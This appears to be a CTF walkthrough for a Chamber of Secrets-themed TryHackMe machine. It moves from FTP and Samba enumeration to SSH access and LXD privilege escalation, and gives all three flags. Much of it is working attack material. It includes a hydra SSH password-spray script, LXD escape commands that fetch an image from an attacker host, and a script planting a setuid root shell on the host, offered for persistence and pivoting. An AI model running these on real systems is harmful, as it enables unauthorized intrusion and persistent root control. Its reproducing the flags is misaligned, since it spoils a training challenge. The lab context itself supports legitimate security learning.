Chamber Of Secrets- Sacramentum Writeup

This post is the official write-up for the Chamber of Secrets-themed machine used in the Sacramentum CTF. The machine is hosted on TryHackMe.

Start by deploying the machine. Once it is up, run a basic Nmap scan with default scripts and version detection to see which ports and services are open on the target IP:

nmap -sC -sV 10.10.79.75 -vv
FTP is open, so let’s try an anonymous login (user ‘anonymous’ with a blank password).

The anonymous login works and the FTP root holds quite a bit: a file (passwd.txt) and two hidden, dot-prefixed directories (‘.GodricGryffindor’ and ‘…’) that a plain directory listing does not show, so always list hidden entries as well.

Let’s go ahead and see what the password file contains.

The content looks like base64, so let’s decode it.

Decoded, it gives us a possible username: Harry.

The folder ‘.GodricGryffindor’ has a file Sword.txt which contains our first flag ‘Ch4mb3r0fS3cr3ts{Al4rt3_A5c3nd@r3}’

The ‘…’ directory holds another passwd.txt, this one containing the string ‘1_4m_Th3_Ch0s3n_0n3’, which is most likely a password.

Trying the tentative username ‘Harry’ with the password ‘1_4m_Th3_Ch0s3n_0n3’ against both FTP and SSH gets us nowhere, so the real username is probably spelled differently and we need a proper user list.

Let’s move on and focus on the Samba service by enumerating it using enum4linux.

The first part of the output (workgroup and OS information) holds nothing useful.

No unusual shares are exposed either.

Voila! The user enumeration, however, gives us the local user accounts.

Let’s try these users with our password ‘1_4m_Th3_Ch0s3n_0n3’.

The pair ‘h4rry’:‘1_4m_Th3_Ch0s3n_0n3’ works over SSH (note the leetspeak spelling, which is why plain ‘Harry’ failed), and after logging in we find the second flag – ‘Ch4mb3r0fS3cr3ts{D3v1Ls_5n4R3}’
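The “try every enumerated user with the one password we have” step above is a single-password spray. The script below is an added example written for this write-up, not part of the original post: it extracts usernames from enum4linux output and hands them to hydra for an SSH spray. The target IP, the password and the enum4linux lines are constructed for illustration; pipe real enum4linux output into it on an engagement.

```shell
#!/bin/sh
# Added example (not from the original write-up): pull usernames out of
# enum4linux output and spray one known password over SSH with hydra.
# The enum4linux sample below is CONSTRUCTED for illustration; the two line
# formats are the ones enum4linux prints for users:
#   "user:[name] rid:[0x...]"                    (enumdomusers)
#   "S-1-22-1-1000 Unix User\name (Local User)"  (RID cycling)
ENUM_SAMPLE=$(cat <<'EOF'
 =====================( Users on 10.10.79.75 )=====================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: h4rry   Name:   Desc:
user:[h4rry] rid:[0x3e8]
S-1-22-1-1000 Unix User\h4rry (Local User)
S-1-22-1-1001 Unix User\alice (Local User)
EOF
)

# extract_users: read enum4linux output on stdin, print each username once.
extract_users() {
  awk '
    /^user:\[/ {                 # user:[h4rry] rid:[0x3e8]
      sub(/^user:\[/, ""); sub(/\].*$/, ""); print; next
    }
    /Unix User\\/ {              # S-1-22-1-1000 Unix User\h4rry (Local User)
      sub(/.*Unix User\\/, ""); sub(/ \(Local User\).*$/, ""); print
    }
  ' | sort -u
}

# spray_ssh <target> <password>  (enum4linux output on stdin)
# Tries the single known password against every enumerated user over SSH.
# -t 4 keeps the parallelism low so sshd does not start dropping connections.
spray_ssh() {
  target=$1; password=$2
  users_file=$(mktemp) || return 1
  extract_users > "$users_file"
  hydra -L "$users_file" -p "$password" -t 4 "ssh://$target"
  status=$?
  rm -f "$users_file"
  return $status
}

# Usage: enum4linux -a 10.10.79.75 > enum.txt
#        sh spray.sh 10.10.79.75 '1_4m_Th3_Ch0s3n_0n3' < enum.txt
if [ $# -eq 2 ]; then
  spray_ssh "$1" "$2"
fi
```

Running it against the constructed sample yields the user list alice, h4rry (duplicates across the two enum4linux formats are collapsed). Keep the thread count low and the attempt count at one password per user: SSH sprays that exceed sshd’s MaxAuthTries or trip fail2ban lock you out of the very service you need.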

From there, while going through the usual privilege-escalation checks, we find that ‘h4rry’ is a member of the lxd group. If you are not familiar with LXD, you can read about it here.

Membership in the lxd group grants access to the LXD socket, which is effectively root: we can create a privileged container, mount the host’s entire filesystem into it, and read or write anything on the host as root from inside the container.

Commands for lxd PrivEsc (the tarball name and attacker IP are placeholders) –

ON ATTACKER MACHINE
1. Clone the Alpine image builder
git clone https://github.com/saghul/lxd-alpine-builder
2. cd lxd-alpine-builder
3. Build the image (the script needs root and drops an alpine-*.tar.gz in the current directory)
sudo ./build-alpine
4. Serve the tarball over HTTP so the victim can fetch it
python3 -m http.server 80    (python -m SimpleHTTPServer 80 on Python 2)

ON VICTIM MACHINE
1. Fetch the tarball from the attacker machine
wget http://<attacker-ip>/<tarfile>
2. Import the image (if lxc complains that no storage pool exists, run ‘lxd init --auto’ first)
lxc image import <tarfile> --alias privesc
3. Create a privileged container from it (privileged means uid 0 inside the container is uid 0 on the host)
lxc init privesc privesc-container -c security.privileged=true
4. Mount the host’s root filesystem into the container at /mnt/root
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start privesc-container
6. lxc exec privesc-container -- /bin/sh

You can find a detailed explanation of lxd escalation here.
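After the last step we are root inside the container, but only the host’s files (under /mnt/root) are reachable, not its processes. The helper below is an added example for this write-up, not code from the original post: run inside the container, it checks that the host filesystem really is mounted, then plants a setuid copy of the host’s bash so that a normal ‘h4rry’ login on the host can become root. The mount point /mnt/root and the destination /tmp/rootbash are assumptions (both can be passed as arguments); pick another destination if the host’s /tmp is mounted nosuid.

```shell
#!/bin/sh
# Added example (not from the original write-up): run this INSIDE the
# privileged container after "lxc exec privesc-container -- /bin/sh".
# Assumptions: the host filesystem is mounted at /mnt/root (the path used in
# the "lxc config device add" step) and /tmp/rootbash is a free path on the host.

# check_host_mount <mount>: succeed only if <mount> looks like a host root,
# i.e. the disk device was added and recursive=true took effect.
check_host_mount() {
  [ -f "$1/etc/passwd" ] && [ -d "$1/root" ] && [ -x "$1/bin/bash" ]
}

# plant_suid_shell <mount> [dest]: copy the host's bash to <dest> on the host
# and mark it setuid. We are uid 0 in the container, and with
# security.privileged=true that is uid 0 on the host too, so the copy is
# root-owned on the host; running "<dest> -p" as h4rry then gives euid 0
# (-p stops bash from dropping the effective uid).
plant_suid_shell() {
  mnt=$1; dest=${2:-/tmp/rootbash}
  cp "$mnt/bin/bash" "$mnt$dest" && chmod 4755 "$mnt$dest"
}

# is_setuid <file>: true when the setuid bit is set (4th char of "ls -l" is 's').
is_setuid() {
  [ "$(ls -ld "$1" | cut -c4)" = "s" ]
}

# Usage inside the container:  sh post_lxd.sh /mnt/root [/tmp/rootbash]
# Then on the host, as h4rry:  /tmp/rootbash -p
if [ $# -ge 1 ]; then
  mnt=$1; dest=${2:-/tmp/rootbash}
  check_host_mount "$mnt" || { echo "host filesystem not found under $mnt" >&2; exit 1; }
  plant_suid_shell "$mnt" "$dest" || exit 1
  is_setuid "$mnt$dest" && echo "planted $dest on the host; run '$dest -p' as h4rry"
  echo "contents of the host's /root:"
  ls -la "$mnt/root"
fi
```

The flag can of course be read straight from /mnt/root/root without any of this; the setuid shell is for when you want an interactive root session on the host itself (persistence, cleanup, or further pivoting), and it should be removed once the engagement is over.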

The root flag is in the /mnt/root/root directory (the host’s /root as seen from inside the container) – ‘Ch4mb3r0fS3cr3ts{1_4m_L0rd_V0ld3m0rt}’
